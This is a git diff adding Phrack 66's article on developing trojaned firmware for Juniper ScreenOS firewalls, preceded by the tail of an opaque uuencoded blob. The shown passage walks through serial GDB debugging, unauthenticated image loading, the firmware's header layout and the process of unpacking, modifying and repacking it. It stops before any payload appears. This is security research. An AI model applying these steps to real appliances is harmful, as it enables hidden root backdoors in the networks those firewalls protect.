+MX^#@X.#@X.#@X.#@X."X$7&U!JZW3AP<'!P<'!P<'!P<'!P<'.L+_':^JT$0
+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
+`
+end
+
+--------[ EOF
diff --git a/phrack66/5.txt b/phrack66/5.txt
new file mode 100644
index 0000000..46ca304
--- /dev/null
+++ b/phrack66/5.txt
@@ -0,0 +1,1197 @@
+				==Phrack Inc.==
+
+		Volume 0x0d, Issue 0x42, Phile #0x05 of 0x11
+
+|=-----------------------------------------------------------------------=|
+|=---------------=[     Netscreen of the Dead:      ]=-------------------=|
+|=-=[ Developing a Trojaned Firmware for Juniper ScreenOS Platforms  ]=--=|
+|=-----------------------------------------------------------------------=|
+|=-----------------------------------------------------------------------=|
+|=-------------------=[     By graeme@lolux.net     ]=-------------------=|
+|=-----------------------------------------------------------------------=|
+
+
+--[ Index
+0x1 - Trailer
+0x2 - Opening Scene
+0x3 - The Attack
+0x4 - Live Evisceration
+0x5 - Feeding on the Remains
+0x6 - Night of the Living Netscreen
+0x7 - Autopsy
+0x8 - Netscreen of the Dead
+0x9 - Zombie Loader
+0xA - 28 Hacks Later
+0xB - Closing Scene
+0xC - References
+0xD - Credits
+0xE - Addendum 
+
+
+--[ 0x1 - Trailer
+
+This article describes how an attacker can obtain, modify and install a 
+modified version of Juniper ScreenOS which can run attacker supplied code 
+which performs hidden operations or operations contrary to the 
+configuration of any Juniper platform running ScreenOS. 
+
+The attacker could be any one of the following:
+- an attacker that has exploited a vulnerability in ScreenOS
+- someone who has illicitly obtained the administrator password
+- someone with physical access to the device (vendor / 3rd party support)
+- an attacker conducting a man-in-the-middle attack on the network
+- a malicious administrator
+
+
+--[ 0x2 - Opening Scene
+
+Netscreens are manufactured by Juniper Inc and are all in one firewall,
+VPN, router security appliance. They range in scale from SME to Datacentre
+(NS5XP --  NS5000). Most are Common Criteria and FIPS certified and run a
+closed source, real time OS called ScreenOS which is supplied by Juniper
+as a binary firmware 'blob'.
+
+The hardware used for this research was a Netscreen NS5XT containing an
+AMCC PowerPC 405 GP RISC processor and 64MB flash. The firmware used as
+the basis for modified firmware images was ScreenOS 5.3.0r10. Interfaces
+for administration are serial console, Telnet, SSH, and HTTP/HTTPS. The
+firmware can be installed from serial console, via the web interface or
+via TFTP. 
+
+The configuration of the device is stored as a file on the flash and is 
+independent of the firmware.
+
+
+--[ 0x3 - The Attack
+
+The goal of the attack is to be able to install attacker modified firmware
+which provides hidden root control of the appliance. When attacking 
+firmware there are two vectors of attack:
+
+1. Live evisceration: debugging with remote GDB debugger over serial line
+
+2. Feeding on the remains: dead listing and static binary analysis using a
+disassembler and hex editor.
+
+The next two sections will discuss these two approaches and how successful
+they were in this specific instance. At this point it is worth noting some
+key features of the PowerPC hardware architecture:
+- fixed instruction size of 4 bytes
+- flat memory model
+- 32 general purpose registers (r0-r31)
+- no explicit stack but convention of using r01
+- link register (lr) for returning to calling function
+- program counter (pc) for current instruction
+- count register (ctr) for loop counter or return address
+- exception register (xer) for exceptions, status and control
+
+Detailed information on the PowerPC architecture is available from the IBM
+PPC405 Embedded Processor Core User Manual which can be downloaded from
+http://www-01.ibm.com/chips/techlib/techlib.nsf/products/
+PowerPC_405_Embedded_Cores
+
+
+--[ 0x4 - Live Evisceration
+
+For live debugging a GDB compiled for PowerPC was required. The Embedded 
+Linux Development Kit (http://www.denx.de/wiki/DULG/ELDK) has GDB compiled
+for a number of embedded platforms including the PowerPC 403 and 405 
+processors. This provides remote debugging of systems over a serial 
+connection.
+
+Obviously no source for ScreenOS was available so it was necessary to
+create a custom GDB init file for displaying PPC registers and 'stack' to
+provide useful information on breaks. GDB reads init files on startup and
+init files use the same syntax as GDB command files and are processed by
+GDB in the same way. The init file in your home directory (~/.gdbinit) can
+set options that affect subsequent processing of command line options and
+operands. An example gdb init file is supplied in the addendum. This gdb
+init file outputs context similar to the windows SoftICE tool which
+reverse engineers should be familiar with. Below is an example of a GDB
+session connected to a Netscreen:
+
+--start gdb session
+
+GNU gdb Red Hat Linux (6.7-1rh)
+Copyright (C) 2007 Free Software Foundation, Inc.
+License GPLv3+: GNU GPL version 3 or later
+<http://gnu.org/licenses/gpl.html>
+This is free software: you are free to change and redistribute it.
+There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
+and "show warranty" for details.
+This GDB was configured as "--host=i686-pc-linux-gnu --target=ppc-linux".
+The target architecture is set automatically (currently powerpc:403)
+
+gdb>target remote /dev/ttyU0
+
+0x0032bea4 in ?? ()
+gdb>
+gdb>context
+
+powerpc
+---------------------------------------------------------------------[regs]
+ r00:00000001 r01:03790528 r02:01358000 r03:FFFFFFFF     pc:0032BEA4
+ r04:0000002E r05:00000000 r06:00000000 r07:00000000
+ r08:01631050 r09:01350000 r10:01630000 r11:01630000     lr:0032C5CC
+ r12:40000022 r13:00000000 r14:6FFFA27F r15:1B9FC3F7
+ r16:00000000 r17:402D04D0 r18:03791470 r19:00000000    ctr:0060A764
+ r20:03790B48 r21:013509AC r22:FFFFFFFF r23:0379147E
+ r24:00000000 r25:00000000 r26:00000000 r27:00000000     cr:40000028
+ r28:03791470 r29:00000000 r30:03790F20 r31:0135098C    xer:20000046
+
+[03790528]----------------------------------------------------------[stack]
+0379058C : 00 00 00 00  00 00 00 00 - 00 00 00 00  00 00 00 00
+03790570 : 00 00 00 00  00 00 00 00 - 00 00 00 00  00 00 00 00
+0379055A : 00 00 00 00  00 00 00 00 - 00 00 00 00  00 00 00 00
+0379053E : A6 40 03 79  06 C0 00 60 - A9 BC 00 00  00 00 00 00 .@y.`..
+03790528 : 03 79 05 30  00 06 22 F0 - 03 79 03 79  05 40 00 32 y0".yy@2
+03790512 : 00 01 03 79  12 58 03 79 - 05 20 0F 20  00 06 37 08 yXy  7
+037904F6 : 00 00 00 00  00 05 01 62 - 9F A0 C2 28  01 4A 05 EA ...(J..
+037904E0 : 03 79 04 E8  00 32 BE 60 - 03 79 03 79  14 70 01 4A y.2.`yypJ
+037904C4 : 01 6F 0A 24  03 79 04 E0 - 00 B8 00 00  00 6C 03 79 o$y..ly
+
+[0032BEA4]-----------------------------------------------------------[code]
+0x32bea4:       lwz     r0,12(r1)
+0x32bea8:       mtlr    r0
+0x32beac:       addi    r1,r1,8
+0x32beb0:       blr
+0x32beb4:       stwu    r1,-40(r1)
+0x32beb8:       mflr    r0
+0x32bebc:       stw     r29,28(r1)
+0x32bec0:       stw     r30,32(r1)
+0x32bec4:       stw     r31,36(r1)
+0x32bec8:       stw     r0,44(r1)
+0x32becc:       mr      r31,r3
+0x32bed0:       lis     r9,322
+0x32bed4:       lwz     r0,-13800(r9)
+0x32bed8:       cmpwi   r0,0
+0x32bedc:       beq-    0x32bef0
+0x32bee0:       lis     r3,196
+----------------------------------------------------------------------
+gdb>
+
+--end gdb session
+
+The steps for remote debugging on the Netscreen are as follows:
+1. Connect to a network interface and the serial console of the Netscreen 
+from a PC.
+2. Over a telnet / SSH session to the Netscreen enable GDB using: 
+	ns5xt>set gdb enable
+3. On the PC start gdbppc and connect to the remote gdb using:
+	gdb>target remote /dev/ttyUSB0
+
+During this research remote debugging was useful for obtaining memory
+dumps and querying specific memory addresses. However setting breakpoints
+or single stepping did not appear to work. Information on how to get these
+features working would be most appreciated by the author. 
+
+Observing the boot process of the Netscreen over a serial console did 
+provide useful information regarding the boot up sequence:
+
+--start boot sequence
+
+	NetScreen NS-5XT Boot Loader Version 2.0.0 (Checksum: A1B6FF9B)
+	Copyright (c) 1997-2003 NetScreen Technologies, Inc.
+	
+	Total physical memory: 64MB
+		Test - Pass
+		Initialization - Done
+	
+	Hit any key to run loader
+	Hit any key to run loader
+	Hit any key to run loader
+	Hit any key to run loader
+	
+	Loading default system image from on-board flash disk...
+	
+	Ignore image authentication!
+	
+	Start loading...
+	.............................................................
+	
+	Done.
+	
+	
+	
+	Juniper Networks, Inc
+	NS-5XT  System Software
+	Copyright, 1997-2004
+	
+	Version 5.3.0r10.0
+	Load Manufacture Information ... Done
+	Load NVRAM Information ... (5.3.0)Done
+	Install module init vectors
+	Verify ACL register default value (at hw reset) ... Done
+	Verify ACL register read/write ... Done
+	Verify ACL rule read/write ... Done
+	Verify ACL rule search ... Done
+	MD5("a") = 0cc175b9 c0f1b6a8 31c399e2 69772661
+	MD5("abc") = 90015098 3cd24fb0 d6963f7d 28e17f72
+	MD5("message digest") = f96b697d 7cb7938d 525a2f31 aaf161d0
+	Verify DES register read/write ... Done
+	
+	Initial port mode trust-untrust(1)
+	Install modules (00c40000,0146d540) ... load dns table 
+	: dns table file do not exist.
+	
+	Initializing DI 1.1.0-ns
+	System config (1129 bytes) loaded
+	.
+	Done.
+	Load System Configuration
+	....................................................Done
+	system init done..
+	System change state to Active(1)
+	login:
+
+--end of boot sequence
+
+Stored boot loader executes and the opportunity is given to load a new
+image over a serial connection. The default behaviour is then to
+uncompress the stored firmware and run the image.
+
+If a new image file is loaded over a serial console it is uncompressed
+and some options are presented. The first prompt allows saving the new
+image to flash. Even if the new image is not stored to flash the next
+prompt allows running the new image. No password is required to load an
+image over the serial line. 
+The boot loader is part of the firmware and if the new boot loader is
+different from the version stored on the flash then the stored boot loader
+is overwritten by the new one.
+
+
+--[ 0x5 - Feeding on the Remains
+
+Static binary analysis was the main method employed in this research.
+ScreenOS images can be downloaded direct from the device or obtained from 
+the Juniper website by Juniper customers. 
+
+ScreenOS provides the following command to download the firmware over
+tftp:
+
+ ns5xt>save software from flash to tftp 192.168.0.42 destination_file
+
+It is important to note that this command downloads the compressed image
+file stored on the flash, not the currently running image from memory
+which may or may not be the same as the image file stored on the flash. 
+
+Using an undocumented command all the files on the flash can be listed:
+
+ ns5xt-> exec vfs ls flash:/
+    $NSBOOT$.BIN              5,177,344
+    envar.rec                 82
+    golerd.rec                0
+    node_secret.ace           0
+    certfile.dsc              252
+    certfile.dat              1,324
+    ns_sys_config             1,129
+    $lkg$.cfg                 1,259
+    syscert.cfg               1,167
+  2,501,632 bytes free (7,686,144 total) on disk
+
+$NSBOOT$.BIN is the firmware stored on flash. To download this securely
+scp can be enabled on the Netscreen. Note the configuration of the device
+is stored in ns_sys_config.
+
+It is also possible to use GDB to dump the complete contents of the memory
+over a serial line. This is sloooow.
+	
+	gdb> set logging on
+	gdb> set height 0
+	gdb> set loging file 'dump'
+	gdb> x /2048000000i
+
+As a Juniper customer I was able to download current and old versions of
+ScreenOS firmware. Many firmware versions were compared as a first step in
+determining the make up of the ScreenOS firmware images. The following 4
+section structure was revealed by this comparative analysis:
+
+
+0x00000000	/--------------------------\
+						|         HEADER           |
+0x00000050	|--------------------------|
+						|                          |
+0x00002020	|--------------------------|
+						|    	   STUB            |
+0x00012940	|--------------------------|
+						|                          |
+0x00012c00	|--------------------------|
+						|     COMPRESSED BLOB      |
+						|                          |
+						|                          |
+						|                          |
+						|                          |
+						|                          |
+						|                          |
+~0x004e6000	\--------------------------/
+
+This is a similar format for other embedded firmware. 
+
+Compressed Firmware Header
+The header consists of the following 4 byte fields making up 32 bytes:
+
+- Signature (magic bytes)
+- Information 4*1 byte fields:  00, Platform, CPU, Version (eg 0x00110A12)
+- Offset  (for program entry point)
+- Address (for program entry point)
+- Size 
+- unknown 
+- unknown
+- Checksum
+
+Points to note are 
+- the size field 		= (size of the compressed blob - 79 bytes)
+- signature 			= 0xEE16BA81
+- offset 			= 0x00000002
+- address			= 0x02860000
+
+and these were always the same in the version 5 firmwares that were
+compared. Version 4 firmwares differed but were similar but these are old
+versions and I will not discuss them here. 
+
+Stub
+
+The stub in the firmware image is responsible for uncompressing the blob
+when the device is booted. This stub contains strings relating to the LZMA
+algorithm so it was assumed that the compressed blob is an LZMA compressed
+binary blob. From the Wikipedia LZMA entry: "Decompression-only code for
+LZMA generally compiles to around 5kB and the amount of RAM required
+during decompression is principally determined by the size of the sliding
+window used during compression. Small code size and relatively low memory
+overhead, particularly with smaller dictionary lengths, and free source
+code make the LZMA decompression algorithm well-suited to embedded
+applications."
+
+Free LZMA utilities are available here: http://tukaani.org/lzma/ and as 
+prebuilt packages for most *nix distributions.
+
+Compressed Blob
+
+The compressed blob is LZMA compressed and contains a header but this is a
+non-standard header. There are non-standard signature bytes for the stub
+to recognise the blob and the LZMA uncompresssed size field is missing.
+
+The standard LZMA header has 3 fields: 
+	options			(2 bytes)
+	dictionary_size		(4 bytes)
+	uncompressed_size  	(8 bytes)
+
+The blob header also has 3 fields but slightly different: 
+	signature		(4 bytes) = 0x1440598
+	options			(2 bytes)
+	dictionary_size		(8 bytes)
+
+The dictionary size is used as a parameter in the compression algorithm.
+LZMA is a dictionary coder which I will not explain here but instead point
+the reader to http://en.wikipedia.org/wiki/Dictionary_coder. 
+
+One approach would have been to attempt to use the header information and
+the stub to decompress the compressed blob but given a lack of PowerPC
+hardware a different approach was taken. The approach used was to cut out
+the compressed blob from the firmware and attempt to decompress it in
+isolation using any tools available. Again using comparative anlalysis,
+the freely available LZMA utilities and direct modification of the header
+bytes the following methods for decompression and compression of the blob
+were reverse engineered. 
+
+The decompression process:
+1. Cut out the compressed blob from the image file.
+2. Insert uncompressed_size equal to -1 which equals unknown size 
+	(-1 uncompresseed size = 0xFFFFFFFFFFFFFFFF)
+3. Modify the dictionary_size from 0x00200000 to 0x00008000.
+4. Decompress the file using standard LZMA utilities.
+
+The modification of the dictionary size was found by fuzzing the field and
+then attempting to decompress. The decompression reports an error at the
+end of the decompression so it is important to decompress to a stream
+otherwise the decompressed data is lost. 
+
+The recompression process:
+1. Compress with standard LZMA utilities using specific compression
+   options
+2. Modify the dictionary_size field 0x00002000 to 0x00200000.
+3. Delete the  uncompressed_size field of 8 bytes.
+4. Concatenate with the header from the original image file.
+
+Proof of concept python scripts are provided in the Addendum which can 
+perform the packing and unpacking of ScreenOS images. The LZMA utilities 
+are necessary for operation of these scripts. 
+
+The recompressed firmware successfully loads onto a Netscreen and runs.
+More research into the dictionary size field was going to be carried out
+but once loading of firmware was successful there were many other more
+interesting avenues of research which took precedence. 
+
+
+--[ 0x6 - Night of the Living Netscreen
+
+So at this stage we have successfully reverse engineered the compression
+of the firmware. We are also in a position to reverse engineer the
+operating system obtained from the decompression.
+
+The steps are:
+
+1. Cut out the compressed blob section of the image
+2. Uncompress the blob. 
+3. Re-compress the modified binary. 
+4. Concatenate the original image header and the modified blob. 
+5. Upgrade the Netscreen with the modified operating system.
+
+So we can install the firmware if we have physical access to the device or
+some kind of funky remote serial console. But we want to be able to
+install firmware over the network. However on attempting to upload a new
+firmware via the device web interface or through the tftp command:
+
+	ns5xt>save software from tftp x.x.x.x  filename to flash
+
+loading fails with a 'bad image file data' error. Note the insecure
+transport mechanism for the firmware. This is vulnerable to a man in the
+middle attack.
+
+We need to fix the size and checksum fields of the compressed firmware
+header. We know the size field needs to be set equal to the compressed
